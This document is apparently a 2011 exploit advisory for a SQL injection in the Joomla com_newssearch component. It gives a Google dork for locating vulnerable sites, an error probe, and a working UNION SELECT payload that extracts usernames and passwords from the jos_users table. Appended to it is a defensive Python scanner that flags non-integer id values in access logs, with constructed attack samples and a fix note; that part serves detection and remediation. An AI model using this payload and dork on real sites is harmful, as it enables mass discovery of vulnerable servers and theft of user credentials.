# Exploit Title: Joomla Component (com_newssearch) SQL Injection Vulnerability
# Google Dork: allinurl: index.php?com_newssearch
# Date: 7/15/2011
# Author: Robert Cooper (admin[at]websiteauditing.org)
# Tested on: [Linux/Windows 7]
# Vulnerable Parameters: id=
##############################################################
Exploit:

http://www.example.com/index.php?option=com_newssearch&type=detail&section=2&id=15'

http://www.example.com/index.php?option=com_newssearch&type=detail&section=2&id=-1 union all select group_concat(username,0x3a,password,0x0a),2,3,4 from jos_users
##############################################################
www.websiteauditing.org
www.areyousecure.net

# Shouts to the Belegit crew
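
A defender-side check for the parameter named above, added here as an example and not part of the original advisory: it scans web-server access logs for com_newssearch requests whose id value is not a plain integer. It assumes id is meant to be a numeric record id (as in the advisory's id=15); the log lines are constructed samples and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Jul/2011:10:00:01 +0000] "GET /index.php?option=com_newssearch'
    '&type=detail&section=2&id=15 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [15/Jul/2011:10:00:07 +0000] "GET /index.php?option=com_newssearch'
    '&type=detail&section=2&id=15%27 HTTP/1.1" 500 312',
    '203.0.113.9 - - [15/Jul/2011:10:00:09 +0000] "GET /index.php?option=com_newssearch'
    '&type=detail&section=2&id=-1+union+all+select+1,2,3,4+from+jos_users HTTP/1.1" 200 2048',
    '198.51.100.2 - - [15/Jul/2011:10:01:00 +0000] "GET /index.php?option=com_content'
    '&id=7 HTTP/1.1" 200 900',
]

# Request line inside the quoted field of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate id is ASCII digits only.
INT_RE = re.compile(r'[0-9]+')


def suspicious_ids(target):
    """Return the decoded id values of a com_newssearch request that are not integers."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if 'com_newssearch' not in (v.lower() for v in params.get('option', [])):
        return []  # a different component: out of scope for this check
    # parse_qs has already percent-decoded the values and turned '+' into a space.
    return [v for v in params.get('id', []) if not INT_RE.fullmatch(v)]


def scan(lines):
    """Return (client_ip, offending_id_value) for every flagged request."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        client_ip = line.split(' ', 1)[0]
        for value in suspicious_ids(match.group(1)):
            hits.append((client_ip, value))
    return hits


if __name__ == '__main__':
    for ip, value in scan(SAMPLE_LOG):
        print(f'{ip} sent non-integer id: {value!r}')
```

The same integer-only rule, enforced where the component reads id before building its query, closes the injection point rather than only detecting its use.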